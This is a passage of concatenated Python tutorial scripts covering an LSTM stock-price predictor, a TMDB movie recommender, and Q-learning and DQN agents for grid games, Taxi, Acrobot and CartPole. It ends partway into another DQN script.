# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=4,
# inter_op_parallelism_threads=4,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
from tensorflow.keras.layers import GRU, LSTM
from price_prediction import PricePrediction
ticker = "AAPL"
p = PricePrediction(ticker, feature_columns=['adjclose', 'volume', 'open', 'high', 'low'],
epochs=700, cell=LSTM, optimizer="rmsprop", n_layers=3, units=256,
loss="mse", shuffle=True, dropout=0.4)
p.train(True)
print(f"The next predicted price for {ticker} is {p.predict()}")
buy_sell = p.predict(classify=True)
print(f"you should {'sell' if buy_sell == 0 else 'buy'}.")
print("Mean Absolute Error:", p.get_MAE())
print("Mean Squared Error:", p.get_MSE())
print(f"Accuracy: {p.get_accuracy()*100:.3f}%")
p.plot_test_set()
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import LSTM, Dense, Dropout
from sklearn import preprocessing
from yahoo_fin import stock_info as si
from collections import deque
import pandas as pd
import numpy as np
import random
def create_model(input_length, units=256, cell=LSTM, n_layers=2, dropout=0.3, loss="mean_absolute_error", optimizer="rmsprop"):
model = Sequential()
for i in range(n_layers):
if i == 0:
# first layer
model.add(cell(units, return_sequences=True, input_shape=(None, input_length)))
model.add(Dropout(dropout))
elif i == n_layers -1:
# last layer
model.add(cell(units, return_sequences=False))
model.add(Dropout(dropout))
else:
# middle layers
model.add(cell(units, return_sequences=True))
model.add(Dropout(dropout))
model.add(Dense(1, activation="linear"))
model.compile(loss=loss, metrics=["mean_absolute_error"], optimizer=optimizer)
return model
def load_data(ticker, n_steps=60, scale=True, split=True, balance=False, shuffle=True,
lookup_step=1, test_size=0.15, price_column='Price', feature_columns=['Price'],
target_column="future", buy_sell=False):
"""Loads data from yahoo finance, if the ticker is a pd Dataframe,
it'll use it instead"""
if isinstance(ticker, str):
df = si.get_data(ticker)
elif isinstance(ticker, pd.DataFrame):
df = ticker
else:
raise TypeError("ticker can be either a str, or a pd.DataFrame instance")
result = {}
result['df'] = df.copy()
# make sure that columns passed is in the dataframe
for col in feature_columns:
assert col in df.columns
column_scaler = {}
if scale:
# scale the data ( from 0 to 1 )
for column in feature_columns:
scaler = preprocessing.MinMaxScaler()
df[column] = scaler.fit_transform(np.expand_dims(df[column].values, axis=1))
column_scaler[column] = scaler
# df[column] = preprocessing.scale(df[column].values)
# add column scaler to the result
result['column_scaler'] = column_scaler
# add future price column ( shift by -1 )
df[target_column] = df[price_column].shift(-lookup_step)
# get last feature elements ( to add them to the last sequence )
# before deleted by df.dropna
last_feature_element = np.array(df[feature_columns].tail(1))
# clean NaN entries
df.dropna(inplace=True)
if buy_sell:
# convert target column to 0 (for sell -down- ) and to 1 ( for buy -up-)
df[target_column] = list(map(classify, df[price_column], df[target_column]))
seq_data = [] # all sequences here
# sequences are made with deque, which keeps the maximum length by popping out older values as new ones come in
sequences = deque(maxlen=n_steps)
for entry, target in zip(df[feature_columns].values, df[target_column].values):
sequences.append(entry)
if len(sequences) == n_steps:
seq_data.append([np.array(sequences), target])
# get the last sequence for future predictions
last_sequence = np.array(sequences)
# shift the sequence, one element is missing ( deleted by dropna )
last_sequence = shift(last_sequence, -1)
# fill the last element
last_sequence[-1] = last_feature_element
# add last sequence to results
result['last_sequence'] = last_sequence
if buy_sell and balance:
buys, sells = [], []
for seq, target in seq_data:
if target == 0:
sells.append([seq, target])
else:
buys.append([seq, target])
# balancing the dataset
lower_length = min(len(buys), len(sells))
buys = buys[:lower_length]
sells = sells[:lower_length]
seq_data = buys + sells
if shuffle:
unshuffled_seq_data = seq_data.copy()
# shuffle data
random.shuffle(seq_data)
X, y = [], []
for seq, target in seq_data:
X.append(seq)
y.append(target)
X = np.array(X)
y = np.array(y)
if shuffle:
unshuffled_X, unshuffled_y = [], []
for seq, target in unshuffled_seq_data:
unshuffled_X.append(seq)
unshuffled_y.append(target)
unshuffled_X = np.array(unshuffled_X)
unshuffled_y = np.array(unshuffled_y)
unshuffled_X = unshuffled_X.reshape((unshuffled_X.shape[0], unshuffled_X.shape[2], unshuffled_X.shape[1]))
X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
if not split:
# return original_df, X, y, column_scaler, last_sequence
result['X'] = X
result['y'] = y
return result
else:
# split dataset into training and testing
n_samples = X.shape[0]
train_samples = int(n_samples * (1 - test_size))
result['X_train'] = X[:train_samples]
result['X_test'] = X[train_samples:]
result['y_train'] = y[:train_samples]
result['y_test'] = y[train_samples:]
if shuffle:
result['unshuffled_X_test'] = unshuffled_X[train_samples:]
result['unshuffled_y_test'] = unshuffled_y[train_samples:]
return result
# from sentdex
def classify(current, future):
if float(future) > float(current): # if the future price is higher than the current, that's a buy, or a 1
return 1
else: # otherwise... it's a 0!
return 0
def shift(arr, num, fill_value=np.nan):
result = np.empty_like(arr)
if num > 0:
result[:num] = fill_value
result[num:] = arr[:-num]
elif num < 0:
result[num:] = fill_value
result[:num] = arr[-num:]
else:
result = arr
return result
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.feature_extraction.text import TfidfVectorizer
movies_path = r"E:\datasets\recommender_systems\tmdb_5000_movies.csv"
credits_path = r"E:\datasets\recommender_systems\tmdb_5000_credits.csv"
credits = pd.read_csv(credits_path)
movies = pd.read_csv(movies_path)
# rename movie_id to id to merge dataframes later
credits = credits.rename(index=str, columns={'movie_id': 'id'})
# join on movie id column
movies = movies.merge(credits, on="id")
# drop useless columns
movies = movies.drop(columns=['homepage', 'title_x', 'title_y', 'status', 'production_countries'])
# number of votes of the movie
V = movies['vote_count']
# rating average of the movie from 0 to 10
R = movies['vote_average']
# the mean vote across the whole report
C = movies['vote_average'].mean()
# minimum votes required to be listed in the top 250
m = movies['vote_count'].quantile(0.7)
movies['weighted_average'] = (V/(V+m) * R) + (m/(m+V) * C)
# ranked movies
wavg = movies.sort_values('weighted_average', ascending=False)
plt.figure(figsize=(16,6))
ax = sns.barplot(x=wavg['weighted_average'].head(10), y=wavg['original_title'].head(10), data=wavg, palette='deep')
plt.xlim(6.75, 8.35)
plt.title('"Best" Movies by TMDB Votes', weight='bold')
plt.xlabel('Weighted Average Score', weight='bold')
plt.ylabel('Movie Title', weight='bold')
plt.savefig('best_movies.png')
popular = movies.sort_values('popularity', ascending=False)
plt.figure(figsize=(16,6))
ax = sns.barplot(x=popular['popularity'].head(10), y=popular['original_title'].head(10), data=popular, palette='deep')
plt.title('"Most Popular" Movies by TMDB Votes', weight='bold')
plt.xlabel('Popularity Score', weight='bold')
plt.ylabel('Movie Title', weight='bold')
plt.savefig('popular_movies.png')
############ Content-Based ############
# filling NaNs with empty string
movies['overview'] = movies['overview'].fillna('')
tfv = TfidfVectorizer(min_df=3, max_features=None,
strip_accents='unicode', analyzer='word',token_pattern=r'\w{1,}',
ngram_range=(1, 3), use_idf=1,smooth_idf=1,sublinear_tf=1,
stop_words = 'english')
tfv_matrix = tfv.fit_transform(movies['overview'])
print(tfv_matrix.shape)
print(tfv_matrix)
import numpy as np
from PIL import Image
import cv2 # showing the env
import matplotlib.pyplot as plt
import pickle
from matplotlib import style
import time
import os
from collections.abc import Iterable
style.use("ggplot")
GRID_SIZE = 10
# how many episodes
EPISODES = 1_000
# how many steps in the env
STEPS = 200
# Rewards for differents events
MOVE_REWARD = -1
ENEMY_REWARD = -300
FOOD_REWARD = 30
epsilon = 0 # for randomness, it'll decay over time by EPSILON_DECAY
EPSILON_DECAY = 0.999993 # every episode, epsilon *= EPSILON_DECAY
SHOW_EVERY = 1
q_table = f"qtable-grid-{GRID_SIZE}-steps-{STEPS}.npy" # put here pretrained model ( if exists )
LEARNING_RATE = 0.1
DISCOUNT = 0.95
PLAYER_CODE = 1
FOOD_CODE = 2
ENEMY_CODE = 3
# blob dict, for colors
COLORS = {
PLAYER_CODE: (255, 120, 0), # blueish color
FOOD_CODE: (0, 255, 0), # green
ENEMY_CODE: (0, 0, 255), # red
}
ACTIONS = {
0: (0, 1),
1: (-1, 0),
2: (0, -1),
3: (1, 0)
}
N_ENEMIES = 2
def get_observation(cords):
obs = []
for item1 in cords:
for item2 in item1:
obs.append(item2+GRID_SIZE-1)
return tuple(obs)
class Blob:
def __init__(self, name=None):
self.x = np.random.randint(0, GRID_SIZE)
self.y = np.random.randint(0, GRID_SIZE)
self.name = name if name else "Blob"
def __sub__(self, other):
return (self.x - other.x, self.y - other.y)
def __str__(self):
return f"<{self.name.capitalize()} x={self.x}, y={self.y}>"
def move(self, x=None, y=None):
# if x is None, move randomly
if x is None:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# if y is None, move randomly
if y is None:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# out of bound fix
if self.x < 0:
# self.x = GRID_SIZE-1
self.x = 0
elif self.x > GRID_SIZE-1:
# self.x = 0
self.x = GRID_SIZE-1
if self.y < 0:
# self.y = GRID_SIZE-1
self.y = 0
elif self.y > GRID_SIZE-1:
# self.y = 0
self.y = GRID_SIZE-1
def take_action(self, choice):
# if choice == 0:
# self.move(x=1, y=1)
# elif choice == 1:
# self.move(x=-1, y=-1)
# elif choice == 2:
# self.move(x=-1, y=1)
# elif choice == 3:
# self.move(x=1, y=-1)
for code, (move_x, move_y) in ACTIONS.items():
if choice == code:
self.move(x=move_x, y=move_y)
# if choice == 0:
# self.move(x=1, y=0)
# elif choice == 1:
# self.move(x=0, y=1)
# elif choice == 2:
# self.move(x=-1, y=0)
# elif choice == 3:
# self.move(x=0, y=-1)
# construct the q_table if not already trained
if q_table is None or not os.path.isfile(q_table):
# q_table = {}
# # for every possible combination of the distance of the player
# # to both the food and the enemy
# for i in range(-GRID_SIZE+1, GRID_SIZE):
# for ii in range(-GRID_SIZE+1, GRID_SIZE):
# for iii in range(-GRID_SIZE+1, GRID_SIZE):
# for iiii in range(-GRID_SIZE+1, GRID_SIZE):
# q_table[(i, ii), (iii, iiii)] = np.random.uniform(-5, 0, size=len(ACTIONS))
q_table = np.random.uniform(-5, 0, size=[GRID_SIZE*2-1]*(2+2*N_ENEMIES) + [len(ACTIONS)])
else:
# the q table already exists
print("Loading Q-table")
q_table = np.load(q_table)
# this list for tracking rewards
episode_rewards = []
# game loop
for episode in range(EPISODES):
# initialize our blobs ( squares )
player = Blob("Player")
food = Blob("Food")
enemy1 = Blob("Enemy1")
enemy2 = Blob("Enemy2")
if episode % SHOW_EVERY == 0:
print(f"[{episode:05}] ep: {epsilon:.4f} reward mean: {np.mean(episode_rewards[-SHOW_EVERY:])} alpha={LEARNING_RATE}")
show = True
else:
show = False
episode_reward = 0
for i in range(STEPS):
# get the observation
obs = get_observation((player - food, player - enemy1, player - enemy2))
# Epsilon-greedy policy
if np.random.random() > epsilon:
# get the action from the q table
action = np.argmax(q_table[obs])
else:
# random action
action = np.random.randint(0, len(ACTIONS))
# take the action
player.take_action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
food.move()
enemy1.move()
enemy2.move()
### for rewarding
if player.x == enemy1.x and player.y == enemy1.y:
# if it hit the enemy, punish
reward = ENEMY_REWARD
elif player.x == enemy2.x and player.y == enemy2.y:
# if it hit the enemy, punish
reward = ENEMY_REWARD
elif player.x == food.x and player.y == food.y:
# if it hit the food, reward
reward = FOOD_REWARD
else:
# else, punish it a little for moving
reward = MOVE_REWARD
### calculate the Q
# get the future observation after taking action
future_obs = get_observation((player - food, player - enemy1, player - enemy2))
# get the max future Q value (SarsaMax algorithm)
# SARSA = State0, Action0, Reward0, State1, Action1
max_future_q = np.max(q_table[future_obs])
# get the current Q
current_q = q_table[obs][action]
# calculate the new Q
if reward == FOOD_REWARD:
new_q = FOOD_REWARD
else:
# value iteration update
# https://en.wikipedia.org/wiki/Q-learning
# Calculate the Temporal-Difference target
td_target = reward + DISCOUNT * max_future_q
# Temporal-Difference
new_q = (1 - LEARNING_RATE) * current_q + LEARNING_RATE * td_target
# update the q
q_table[obs][action] = new_q
if show:
env = np.zeros((GRID_SIZE, GRID_SIZE, 3), dtype=np.uint8)
# set food blob to green
env[food.x][food.y] = COLORS[FOOD_CODE]
# set the enemy blob to red
env[enemy1.x][enemy1.y] = COLORS[ENEMY_CODE]
env[enemy2.x][enemy2.y] = COLORS[ENEMY_CODE]
# set the player blob to blueish
env[player.x][player.y] = COLORS[PLAYER_CODE]
# get the image
image = Image.fromarray(env, 'RGB')
image = image.resize((600, 600))
# show the image
cv2.imshow("image", np.array(image))
if reward == FOOD_REWARD or reward == ENEMY_REWARD:
if cv2.waitKey(500) == ord('q'):
break
else:
if cv2.waitKey(100) == ord('q'):
break
episode_reward += reward
if reward == FOOD_REWARD or reward == ENEMY_REWARD:
break
episode_rewards.append(episode_reward)
# decay a little randomness in each episode
epsilon *= EPSILON_DECAY
# with open(f"qtable-{int(time.time())}.pickle", "wb") as f:
# pickle.dump(q_table, f)
np.save(f"qtable-grid-{GRID_SIZE}-steps-{STEPS}", q_table)
moving_avg = np.convolve(episode_rewards, np.ones((SHOW_EVERY,))/SHOW_EVERY, mode='valid')
plt.plot([i for i in range(len(moving_avg))], moving_avg)
plt.ylabel(f"Avg Reward every {SHOW_EVERY}")
plt.xlabel("Episode")
plt.show()
import numpy as np
import gym
import random
import matplotlib.pyplot as plt
import os
import time
env = gym.make("Taxi-v2").env
# init the Q-Table
# (500x6) matrix (n_states x n_actions)
q_table = np.zeros((env.observation_space.n, env.action_space.n))
# Hyper Parameters
# alpha
LEARNING_RATE = 0.1
# gamma
DISCOUNT_RATE = 0.9
EPSILON = 0.9
EPSILON_DECAY = 0.99993
EPISODES = 100_000
SHOW_EVERY = 1_000
# for plotting metrics
all_epochs = []
all_penalties = []
all_rewards = []
for i in range(EPISODES):
# reset the env
state = env.reset()
epochs, penalties, rewards = 0, 0, []
done = False
while not done:
if random.random() < EPSILON:
# exploration
action = env.action_space.sample()
else:
# exploitation
action = np.argmax(q_table[state])
next_state, reward, done, info = env.step(action)
old_q = q_table[state, action]
future_q = np.max(q_table[next_state])
# calculate the new Q ( Q-Learning equation, i.e SARSAMAX )
new_q = (1 - LEARNING_RATE) * old_q + LEARNING_RATE * ( reward + DISCOUNT_RATE * future_q)
# update the new Q
q_table[state, action] = new_q
if reward == -10:
penalties += 1
state = next_state
epochs += 1
rewards.append(reward)
if i % SHOW_EVERY == 0:
print(f"[{i}] avg reward:{np.average(all_rewards):.4f} eps:{EPSILON:.4f}")
# env.render()
all_epochs.append(epochs)
all_penalties.append(penalties)
all_rewards.append(np.average(rewards))
EPSILON *= EPSILON_DECAY
# env.render()
# plt.plot(list(range(len(all_rewards))), all_rewards)
# plt.show()
print("Playing in 5 seconds...")
time.sleep(5)
os.system("cls") if "nt" in os.name else os.system("clear")
# render
state = env.reset()
done = False
while not done:
action = np.argmax(q_table[state])
state, reward, done, info = env.step(action)
env.render()
time.sleep(0.2)
os.system("cls") if "nt" in os.name else os.system("clear")
env.render()
import cv2
from PIL import Image
import os
# to use CPU uncomment below code
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Activation, Flatten
from keras.optimizers import Adam
EPISODES = 5_000
REPLAY_MEMORY_MAX = 20_000
MIN_REPLAY_MEMORY = 1_000
SHOW_EVERY = 50
RENDER_EVERY = 100
LEARN_EVERY = 50
GRID_SIZE = 20
ACTION_SIZE = 9
class Blob:
def __init__(self, size):
self.size = size
self.x = np.random.randint(0, size)
self.y = np.random.randint(0, size)
def __str__(self):
return f"Blob ({self.x}, {self.y})"
def __sub__(self, other):
return (self.x-other.x, self.y-other.y)
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def action(self, choice):
'''
Gives us 9 total movement options. (0,1,2,3,4,5,6,7,8)
'''
if choice == 0:
self.move(x=1, y=1)
elif choice == 1:
self.move(x=-1, y=-1)
elif choice == 2:
self.move(x=-1, y=1)
elif choice == 3:
self.move(x=1, y=-1)
elif choice == 4:
self.move(x=1, y=0)
elif choice == 5:
self.move(x=-1, y=0)
elif choice == 6:
self.move(x=0, y=1)
elif choice == 7:
self.move(x=0, y=-1)
elif choice == 8:
self.move(x=0, y=0)
def move(self, x=False, y=False):
# If no value for x, move randomly
if not x:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# If no value for y, move randomly
if not y:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# If we are out of bounds, fix!
if self.x < 0:
self.x = 0
elif self.x > self.size-1:
self.x = self.size-1
if self.y < 0:
self.y = 0
elif self.y > self.size-1:
self.y = self.size-1
class BlobEnv:
RETURN_IMAGES = True
MOVE_PENALTY = 1
ENEMY_PENALTY = 300
FOOD_REWARD = 25
ACTION_SPACE_SIZE = 9
PLAYER_N = 1 # player key in dict
FOOD_N = 2 # food key in dict
ENEMY_N = 3 # enemy key in dict
# the dict! (colors)
d = {1: (255, 175, 0),
2: (0, 255, 0),
3: (0, 0, 255)}
def __init__(self, size):
self.SIZE = size
self.OBSERVATION_SPACE_VALUES = (self.SIZE, self.SIZE, 3) # 4
def reset(self):
self.player = Blob(self.SIZE)
self.food = Blob(self.SIZE)
while self.food == self.player:
self.food = Blob(self.SIZE)
self.enemy = Blob(self.SIZE)
while self.enemy == self.player or self.enemy == self.food:
self.enemy = Blob(self.SIZE)
self.episode_step = 0
if self.RETURN_IMAGES:
observation = np.array(self.get_image())
else:
observation = (self.player-self.food) + (self.player-self.enemy)
return observation
def step(self, action):
self.episode_step += 1
self.player.action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
if self.RETURN_IMAGES:
new_observation = np.array(self.get_image())
else:
new_observation = (self.player-self.food) + (self.player-self.enemy)
if self.player == self.enemy:
reward = -self.ENEMY_PENALTY
done = True
elif self.player == self.food:
reward = self.FOOD_REWARD
done = True
else:
reward = -self.MOVE_PENALTY
if self.episode_step < 200:
done = False
else:
done = True
return new_observation, reward, done
def render(self):
img = self.get_image()
img = img.resize((300, 300)) # resizing so we can see our agent in all its glory.
cv2.imshow("image", np.array(img)) # show it!
cv2.waitKey(1)
# FOR CNN #
def get_image(self):
env = np.zeros((self.SIZE, self.SIZE, 3), dtype=np.uint8) # starts an rbg of our size
env[self.food.x][self.food.y] = self.d[self.FOOD_N] # sets the food location tile to green color
env[self.enemy.x][self.enemy.y] = self.d[self.ENEMY_N] # sets the enemy location to red
env[self.player.x][self.player.y] = self.d[self.PLAYER_N] # sets the player tile to blue
img = Image.fromarray(env, 'RGB') # reading to rgb. Apparently. Even tho color definitions are bgr. ???
return img
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
# discount rate
self.gamma = 0.95
# exploration rate
self.epsilon = 1.0
self.epsilon_min = 0.01
self.epsilon_decay = 0.9997
self.learning_rate = 0.001
# models to be built
# Dual
self.model = self.build_model()
self.target_model = self.build_model()
self.update_target_model()
def build_model(self):
"""Builds the DQN Model"""
# Neural network for Deep-Q Learning Model
model = Sequential()
model.add(Conv2D(256, (3, 3), input_shape=self.state_size))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3)))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(32))
# output layer
model.add(Dense(self.action_size, activation="linear"))
model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
return model
def update_target_model(self):
"""Copy weights from self.model to self.target_model"""
self.target_model.set_weights(self.model.get_weights())
def remember(self, state, action, reward, next_state, done):
"""Adds a sample to the memory"""
# for images, expand dimension, comment if you are not using images as states
state = state / 255
next_state = next_state / 255
state = np.expand_dims(state, axis=0)
next_state = np.expand_dims(next_state, axis=0)
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
"""Takes action using Epsilon-Greedy Policy"""
if np.random.random() <= self.epsilon:
return random.randint(0, self.action_size-1)
else:
state = state / 255
state = np.expand_dims(state, axis=0)
act_values = self.model.predict(state)
# print("act_values:", act_values.shape)
return np.argmax(act_values[0])
def replay(self, batch_size):
"""Train on a replay memory with a batch_size of samples"""
if len(self.memory) < MIN_REPLAY_MEMORY:
return
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = ( reward + self.gamma * np.max(self.target_model.predict(next_state)[0]) )
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0, batch_size=1)
# decay epsilon if possible
self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
def load(self, name):
self.model.load_weights(name)
self.target_model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
self.target_model.save_weights(name)
if __name__ == "__main__":
batch_size = 64
env = BlobEnv(GRID_SIZE)
agent = DQNAgent(env.OBSERVATION_SPACE_VALUES, ACTION_SIZE)
ep_rewards = deque([-200], maxlen=SHOW_EVERY)
avg_rewards = []
min_rewards = []
max_rewards = []
for episode in range(1, EPISODES+1):
# restarting episode => reset episode reward and step number
episode_reward = 0
step = 1
# reset env and get init state
current_state = env.reset()
done = False
while True:
# take action
action = agent.act(current_state)
next_state, reward, done = env.step(action)
episode_reward += reward
if episode % RENDER_EVERY == 0:
env.render()
# add transition to agent's memory
agent.remember(current_state, action, reward, next_state, done)
if step % LEARN_EVERY == 0:
agent.replay(batch_size=batch_size)
current_state = next_state
step += 1
if done:
agent.update_target_model()
break
ep_rewards.append(episode_reward)
avg_reward = np.mean(ep_rewards)
min_reward = min(ep_rewards)
max_reward = max(ep_rewards)
avg_rewards.append(avg_reward)
min_rewards.append(min_reward)
max_rewards.append(max_reward)
print(f"[{episode}] avg:{avg_reward:.2f} min:{min_reward} max:{max_reward} eps:{agent.epsilon:.4f}")
# if episode % SHOW_EVERY == 0:
# print(f"[{episode}] avg: {avg_reward} min: {min_reward} max: {max_reward} eps: {agent.epsilon:.4f}")
episodes = list(range(EPISODES))
plt.plot(episodes, avg_rewards, c='b')
plt.plot(episodes, min_rewards, c='r')
plt.plot(episodes, max_rewards, c='g')
plt.show()
agent.save("blob_v1.h5")
import os
# to use CPU uncomment below code
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam
EPISODES = 5_000
REPLAY_MEMORY_MAX = 2_000
SHOW_EVERY = 500
RENDER_EVERY = 1_000
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
# discount rate
self.gamma = 0.95
# exploration rate
self.epsilon = 1.0
self.epsilon_min = 0.01
self.epsilon_decay = 0.9997
self.learning_rate = 0.001
# models to be built
# Dual
self.model = self.build_model()
self.target_model = self.build_model()
self.update_target_model()
def build_model(self):
"""Builds the DQN Model"""
# Neural network for Deep-Q Learning Model
model = Sequential()
model.add(Dense(32, input_dim=self.state_size, activation="relu"))
model.add(Dense(32, activation="relu"))
# output layer
model.add(Dense(self.action_size, activation="linear"))
model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
return model
def update_target_model(self):
"""Copy weights from self.model to self.target_model"""
self.target_model.set_weights(self.model.get_weights())
def remember(self, state, action, reward, next_state, done):
"""Adds a sample to the memory"""
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
"""Takes action using Epsilon-Greedy Policy"""
if np.random.random() <= self.epsilon:
return random.randint(0, self.action_size-1)
else:
act_values = self.model.predict(state)
# print("act_values:", act_values.shape)
return np.argmax(act_values[0])
def replay(self, batch_size):
"""Train on a replay memory with a batch_size of samples"""
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = ( reward + self.gamma * np.max(self.target_model.predict(next_state)[0]) )
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0)
# decay epsilon if possible
self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
def load(self, name):
self.model.load_weights(name)
self.target_model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
self.target_model.save_weights(name)
if __name__ == "__main__":
env = gym.make("Acrobot-v1")
state_size = env.observation_space.shape[0]
action_size = env.action_space.n
agent = DQNAgent(state_size=state_size, action_size=action_size)
# agent.load("AcroBot_v1.h5")
done = False
batch_size = 32
all_rewards = deque(maxlen=SHOW_EVERY)
avg_rewards = []
for e in range(EPISODES):
state = env.reset()
state = np.reshape(state, (1, state_size))
rewards = 0
while True:
action = agent.act(state)
# print(action)
next_state, reward, done, info = env.step(action)
# punish if not yet finished
# reward = reward if not done else 10
next_state = np.reshape(next_state, (1, state_size))
agent.remember(state, action, reward, next_state, done)
state = next_state
if done:
agent.update_target_model()
break
if e % RENDER_EVERY == 0:
env.render()
rewards += reward
# print(rewards)
all_rewards.append(rewards)
avg_reward = np.mean(all_rewards)
avg_rewards.append(avg_reward)
if e % SHOW_EVERY == 0:
print(f"[{e:4}] avg reward:{avg_reward:.3f} eps: {agent.epsilon:.2f}")
if len(agent.memory) > batch_size:
agent.replay(batch_size)
agent.save("AcroBot_v1.h5")
plt.plot(list(range(EPISODES)), avg_rewards)
plt.show()
import os
# to use CPU uncomment below code
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam
EPISODES = 1000
REPLAY_MEMORY_MAX = 5000
SHOW_EVERY = 100
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
# discount rate
self.gamma = 0.95
# exploration rate
self.epsilon = 1.0
self.epsilon_min = 0.01
self.epsilon_decay = 0.995
self.learning_rate = 0.001
# model to be built
self.model = None
self.build_model()
def build_model(self):
"""Builds the DQN Model"""
# Neural network for Deep-Q Learning Model
model = Sequential()
model.add(Dense(24, input_dim=self.state_size, activation="relu"))
model.add(Dense(24, activation="relu"))
# output layer
model.add(Dense(self.action_size, activation="linear"))
model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
self.model = model
def remember(self, state, action, reward, next_state, done):
"""Adds a sample to the memory"""
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
"""Takes action using Epsilon-Greedy Policy"""
if np.random.random() <= self.epsilon:
return random.randint(0, self.action_size-1)
else:
act_values = self.model.predict(state)
# print("act_values:", act_values.shape)
return np.argmax(act_values[0])
def replay(self, batch_size):
"""Train on a replay memory with a batch_size of samples"""
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = ( reward + self.gamma * np.max(self.model.predict(next_state)[0]) )
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0)
# decay epsilon if possible
self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
def load(self, name):
self.model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
if __name__ == "__main__":
env = gym.make("CartPole-v1")
state_size = env.observation_space.shape[0]
action_size = env.action_space.n
agent = DQNAgent(state_size=state_size, action_size=action_size)
done = False
batch_size = 32
scores = []
avg_scores = []
avg_score = 0
for e in range(EPISODES):
state = env.reset()
state = np.reshape(state, (1, state_size))
for t in range(500):
action = agent.act(state)
# print(action)
next_state, reward, done, info = env.step(action)
# punish if not yet finished
reward = reward if not done else -10
next_state = np.reshape(next_state, (1, state_size))
agent.remember(state, action, reward, next_state, done)
state = next_state
if done:
print(f"[{e:4}] avg score:{avg_score:.3f} eps: {agent.epsilon:.2f}")
break
if e % SHOW_EVERY == 0:
env.render()
if len(agent.memory) > batch_size:
agent.replay(batch_size)
scores.append(t)
avg_score = np.average(scores)
avg_scores.append(avg_score)
agent.save("v1.h5")
plt.plot(list(range(EPISODES)), avg_scores)
plt.show()
import numpy as np
import keras.backend.tensorflow_backend as backend
from keras.models import Sequential
from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten, LSTM
from keras.optimizers import Adam
from keras.callbacks import TensorBoard
import tensorflow as tf
from collections import deque
import time
import random
from tqdm import tqdm
import os
from PIL import Image
import cv2
import itertools
DISCOUNT = 0.96
REPLAY_MEMORY_SIZE = 50_000 # How many last steps to keep for model training
MIN_REPLAY_MEMORY_SIZE = 1_000 # Minimum number of steps in a memory to start training
MINIBATCH_SIZE = 32 # How many steps (samples) to use for training
UPDATE_TARGET_EVERY = 5 # Terminal states (end of episodes)
MODEL_NAME = '3x128-LSTM-7enemies-'
